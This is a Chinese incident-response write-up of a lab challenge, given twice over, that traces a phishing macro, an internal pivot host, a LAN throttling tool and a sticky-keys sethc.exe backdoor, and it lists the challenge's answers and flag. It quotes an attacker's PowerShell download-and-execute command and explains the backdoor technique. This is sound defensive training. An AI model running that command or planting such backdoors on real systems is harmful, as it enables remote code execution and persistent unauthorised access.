前景需要小王从某安全大厂被优化掉后来到了某私立小学当起了计算机老师。某一天上课的时候发现鼠标在自己动弹又发现除了某台电脑其他电脑连不上网络。感觉肯定有学生捣乱于是开启了应急。1.攻击者的外网IP地址2.攻击者的内网跳板IP地址3.攻击者使用的限速软件的md5大写4.攻击者的后门md5大写5.攻击者留下的flag解题运行桌面上解题工具.exe即可相关账户密码Administratorzgsf2024一、攻击者外网 IP 地址拿到靶机后第一反应肯定是先看当前主机有没有异常外联。毕竟题目里说“鼠标自己动”很容易让人想到远控或者木马连接。因此先使用netstat -ano查看当前计算机的网络连接情况。不过一开始并没有发现特别明显的异常外网 IP 请求。既然当前网络连接没有直接结果那下一步就转向登录日志看看有没有可疑 IP 登录、爆破失败记录或者远程连接记录。可以使用compmgmt.msc进入计算机管理然后在事件查看器中筛选相关事件 ID。常见登录相关事件 ID 如下事件 ID 含义4624 登录成功4625 登录失败4634 用户注销4647 用户主动注销4672 特权用户登录4776 NTLM 身份验证1149 远程桌面 RDP 登录成功我首先排查了 4624 登录成功日志但是没有发现明显异常。接着查看 4625 登录失败日志也没有发现有价值的信息。远程登录相关日志也没有看到有用线索。这说明攻击者大概率不是通过正常远程登录进入这台机器的。接下来继续查看是否存在恶意启动项。一个破坏者如果想长期控制一台电脑很可能会在启动项中安插恶意程序。但这里也没有发现明显恶意程序。再看计划任务也没有发现明显恶意进程或可疑任务。到这里常规登录、启动项、计划任务都没发现问题就需要把注意力放回桌面文件上。桌面上有几个比较显眼的 Word 文档。打开这些文件后再次使用netstat -ano可以发现主机主动访问了一个外网 IP。这就比较明显了这些文档很可能不是普通文件而是钓鱼文档里面存在恶意宏代码。我尝试把文件转移到本机进一步分析结果被火绒直接查杀提示 Office 文档中存在宏病毒。继续查看宏代码可以看到它的大致逻辑是打开文档后自动执行宏将一段 shellcode 注入到 rundll32.exe 进程中然后连接外网 IP 8.219.200.130。最后使用云沙箱分析也能看到该文件存在宏注入行为。因此第一题答案为8.219.200.130二、攻击者的内网跳板 IP 地址第一题是从桌面恶意文件入手找到的所以第二题我也优先从桌面继续排查。在桌面文件中除了恶意 Word 文档外还有一个和 phpStudy 修复相关的文件。右键编辑后可以看到其中存在一条 PowerShell 下载执行命令powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(http://192.168.20.129:801/a))这条命令的意思是-nop不加载 PowerShell 配置文件-w hidden隐藏窗口执行downloadstring从远程地址下载脚本内容IEX将下载下来的内容直接当作 PowerShell 代码执行。也就是说它会访问http://192.168.20.129:801/a下载并执行恶意脚本。这里的 192.168.20.129 是内网地址结合题目问“内网跳板 IP”基本可以确定它就是攻击者的内网跳板机。第二题答案为192.168.20.129三、攻击者使用的限速软件 MD5 大写第三题问的是攻击者使用的限速软件 MD5。题目背景里有一个很关键的现象除了某台电脑其他电脑都连不上网络。这个现象非常像局域网限速、ARP 欺骗或者断网工具造成的。所以这里要找的不是恶意宏也不是 PowerShell而是类似P2P 终结者NetCut聚生网管NetLimiterARP 类控制工具。首先排查桌面和下载目录看是否存在未知压缩包、安装程序或者文件夹但这里没有找到明显结果。随后继续在 C 盘中查找在 C:\PerfLogs 下发现了一个套娃目录。一路点进去之后最终发现了一个可疑程序p2pover4.34.exep2pover 很明显就是 P2POver也就是常说的 P2P 终结者属于典型的局域网限速、断网工具正好对应题目中“其他电脑无法联网”的现象。接下来使用 certutil 计算该文件的 MD5certutil -hashfile p2pover4.34.exe MD5得到 MD5 后注意题目要求是大写所以第三题答案为2A5D8838BDB4D404EC632318C94ADC96四、攻击者的后门 MD5 大写第四题问的是攻击者留下的后门。这里和第三题的思路不一样。第三题是找“限速工具”第四题要找的是“权限维持后门”。一开始我也沿着启动项、计划任务、PowerShell 日志这些方向排查但是没有发现特别明显的结果。既然常规持久化位置没有明显线索就要考虑 Windows 中比较经典的后门方式比如粘滞键后门辅助功能后门IFEO 映像劫持系统文件替换。这里重点关注C:\Windows\System32\sethc.exesethc.exe 是 Windows 的粘滞键程序。正常情况下连续按 5 次 Shift 会触发粘滞键提示。但攻击者经常会把它替换成 cmd.exe 或自己的后门程序。这样在登录界面连续按 5 次 Shift就可能直接弹出命令行或者后门程序。在 System32 目录下查看时发现 sethc.exe 明显异常它的修改时间和大小都不太正常结合题目问“后门”基本可以判断这个文件就是被攻击者替换过的粘滞键后门。接下来还是使用 certutil 计算该文件的 MD5certutil -hashfile C:\Windows\System32\sethc.exe MD5得到结果后转换为大写第四题答案为58A3FF82A1AFF927809C529EB1385DA1五、攻击者留下的 flag最后一题比较直接。既然第四题已经确定后门文件是 sethc.exe那么 flag 很可能就在这个后门程序中。可以直接打开这个文件查看也可以连续按 5 次 Shift 触发粘滞键后门。最终得到 flagflag{zgsfshift666}六、最终答案汇总题号 问题 答案1 攻击者的外网 IP 地址 8.219.200.1302 攻击者的内网跳板 IP 地址 192.168.20.1293 限速软件 MD5 大写 2A5D8838BDB4D404EC632318C94ADC964 后门 MD5 大写 58A3FF82A1AFF927809C529EB1385DA15 攻击者留下的 flag flag{zgsfshift666}七、总结这道题的整体攻击链大概是恶意 Office 文档↓宏代码执行 shellcode↓连接外网 IP 8.219.200.130↓PowerShell 下载执行内网脚本↓内网跳板 IP 192.168.20.129↓使用 P2POver 进行局域网限速/断网↓替换 sethc.exe 留下粘滞键后门↓通过后门文件拿到 flag整体来说这道题还是比较综合的。它不是单纯查一个日志就能出结果而是需要从网络连接、登录日志、启动项、计划任务、桌面文件、恶意宏、限速工具、系统后门几个方向一起排查。不过说实话做到最后还是有点绷不住。题目背景说是“小学计算机老师”结果学生会钓鱼文档、宏注入、PowerShell 下载执行、P2P 限速还知道粘滞键后门。这真的是小学吗怎么不是同龄人也酱味大鸡我
ATTCK实战系列——蓝队防御(六)应急响应复盘
前景需要小王从某安全大厂被优化掉后来到了某私立小学当起了计算机老师。某一天上课的时候发现鼠标在自己动弹又发现除了某台电脑其他电脑连不上网络。感觉肯定有学生捣乱于是开启了应急。1.攻击者的外网IP地址2.攻击者的内网跳板IP地址3.攻击者使用的限速软件的md5大写4.攻击者的后门md5大写5.攻击者留下的flag解题运行桌面上解题工具.exe即可相关账户密码Administratorzgsf2024一、攻击者外网 IP 地址拿到靶机后第一反应肯定是先看当前主机有没有异常外联。毕竟题目里说“鼠标自己动”很容易让人想到远控或者木马连接。因此先使用netstat -ano查看当前计算机的网络连接情况。不过一开始并没有发现特别明显的异常外网 IP 请求。既然当前网络连接没有直接结果那下一步就转向登录日志看看有没有可疑 IP 登录、爆破失败记录或者远程连接记录。可以使用compmgmt.msc进入计算机管理然后在事件查看器中筛选相关事件 ID。常见登录相关事件 ID 如下事件 ID 含义4624 登录成功4625 登录失败4634 用户注销4647 用户主动注销4672 特权用户登录4776 NTLM 身份验证1149 远程桌面 RDP 登录成功我首先排查了 4624 登录成功日志但是没有发现明显异常。接着查看 4625 登录失败日志也没有发现有价值的信息。远程登录相关日志也没有看到有用线索。这说明攻击者大概率不是通过正常远程登录进入这台机器的。接下来继续查看是否存在恶意启动项。一个破坏者如果想长期控制一台电脑很可能会在启动项中安插恶意程序。但这里也没有发现明显恶意程序。再看计划任务也没有发现明显恶意进程或可疑任务。到这里常规登录、启动项、计划任务都没发现问题就需要把注意力放回桌面文件上。桌面上有几个比较显眼的 Word 文档。打开这些文件后再次使用netstat -ano可以发现主机主动访问了一个外网 IP。这就比较明显了这些文档很可能不是普通文件而是钓鱼文档里面存在恶意宏代码。我尝试把文件转移到本机进一步分析结果被火绒直接查杀提示 Office 文档中存在宏病毒。继续查看宏代码可以看到它的大致逻辑是打开文档后自动执行宏将一段 shellcode 注入到 rundll32.exe 进程中然后连接外网 IP 8.219.200.130。最后使用云沙箱分析也能看到该文件存在宏注入行为。因此第一题答案为8.219.200.130二、攻击者的内网跳板 IP 地址第一题是从桌面恶意文件入手找到的所以第二题我也优先从桌面继续排查。在桌面文件中除了恶意 Word 文档外还有一个和 phpStudy 修复相关的文件。右键编辑后可以看到其中存在一条 PowerShell 下载执行命令powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(http://192.168.20.129:801/a))这条命令的意思是-nop不加载 PowerShell 配置文件-w hidden隐藏窗口执行downloadstring从远程地址下载脚本内容IEX将下载下来的内容直接当作 PowerShell 代码执行。也就是说它会访问http://192.168.20.129:801/a下载并执行恶意脚本。这里的 192.168.20.129 是内网地址结合题目问“内网跳板 IP”基本可以确定它就是攻击者的内网跳板机。第二题答案为192.168.20.129三、攻击者使用的限速软件 MD5 大写第三题问的是攻击者使用的限速软件 MD5。题目背景里有一个很关键的现象除了某台电脑其他电脑都连不上网络。这个现象非常像局域网限速、ARP 欺骗或者断网工具造成的。所以这里要找的不是恶意宏也不是 PowerShell而是类似P2P 终结者NetCut聚生网管NetLimiterARP 类控制工具。首先排查桌面和下载目录看是否存在未知压缩包、安装程序或者文件夹但这里没有找到明显结果。随后继续在 C 盘中查找在 C:\PerfLogs 下发现了一个套娃目录。一路点进去之后最终发现了一个可疑程序p2pover4.34.exep2pover 很明显就是 P2POver也就是常说的 P2P 终结者属于典型的局域网限速、断网工具正好对应题目中“其他电脑无法联网”的现象。接下来使用 certutil 计算该文件的 MD5certutil -hashfile p2pover4.34.exe MD5得到 MD5 后注意题目要求是大写所以第三题答案为2A5D8838BDB4D404EC632318C94ADC96四、攻击者的后门 MD5 大写第四题问的是攻击者留下的后门。这里和第三题的思路不一样。第三题是找“限速工具”第四题要找的是“权限维持后门”。一开始我也沿着启动项、计划任务、PowerShell 日志这些方向排查但是没有发现特别明显的结果。既然常规持久化位置没有明显线索就要考虑 Windows 中比较经典的后门方式比如粘滞键后门辅助功能后门IFEO 映像劫持系统文件替换。这里重点关注C:\Windows\System32\sethc.exesethc.exe 是 Windows 的粘滞键程序。正常情况下连续按 5 次 Shift 会触发粘滞键提示。但攻击者经常会把它替换成 cmd.exe 或自己的后门程序。这样在登录界面连续按 5 次 Shift就可能直接弹出命令行或者后门程序。在 System32 目录下查看时发现 sethc.exe 明显异常它的修改时间和大小都不太正常结合题目问“后门”基本可以判断这个文件就是被攻击者替换过的粘滞键后门。接下来还是使用 certutil 计算该文件的 MD5certutil -hashfile C:\Windows\System32\sethc.exe MD5得到结果后转换为大写第四题答案为58A3FF82A1AFF927809C529EB1385DA1五、攻击者留下的 flag最后一题比较直接。既然第四题已经确定后门文件是 sethc.exe那么 flag 很可能就在这个后门程序中。可以直接打开这个文件查看也可以连续按 5 次 Shift 触发粘滞键后门。最终得到 flagflag{zgsfshift666}六、最终答案汇总题号 问题 答案1 攻击者的外网 IP 地址 8.219.200.1302 攻击者的内网跳板 IP 地址 192.168.20.1293 限速软件 MD5 大写 2A5D8838BDB4D404EC632318C94ADC964 后门 MD5 大写 58A3FF82A1AFF927809C529EB1385DA15 攻击者留下的 flag flag{zgsfshift666}七、总结这道题的整体攻击链大概是恶意 Office 文档↓宏代码执行 shellcode↓连接外网 IP 8.219.200.130↓PowerShell 下载执行内网脚本↓内网跳板 IP 192.168.20.129↓使用 P2POver 进行局域网限速/断网↓替换 sethc.exe 留下粘滞键后门↓通过后门文件拿到 flag整体来说这道题还是比较综合的。它不是单纯查一个日志就能出结果而是需要从网络连接、登录日志、启动项、计划任务、桌面文件、恶意宏、限速工具、系统后门几个方向一起排查。不过说实话做到最后还是有点绷不住。题目背景说是“小学计算机老师”结果学生会钓鱼文档、宏注入、PowerShell 下载执行、P2P 限速还知道粘滞键后门。这真的是小学吗怎么不是同龄人也酱味大鸡我
